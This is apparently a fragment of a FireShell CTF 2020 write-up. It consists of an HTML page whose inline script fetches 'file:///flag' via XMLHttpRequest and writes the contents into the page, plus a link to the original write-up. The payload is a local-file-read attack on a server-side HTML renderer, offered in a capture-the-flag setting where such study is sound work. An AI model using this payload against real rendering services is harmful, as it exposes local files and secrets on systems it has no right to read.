```

<html>
<head>
<title>Captain</title>
</head>
<body>
<script>
flag=new XMLHttpRequest;flag.onload=function(){document.write(this.responseText)};flag.open("GET","file:///flag");flag.send();
</script>
</body>
</html>
```

Original writeup (https://blog.shoebpatel.com/2020/03/23/FireShell-CTF-2020-Write-up/).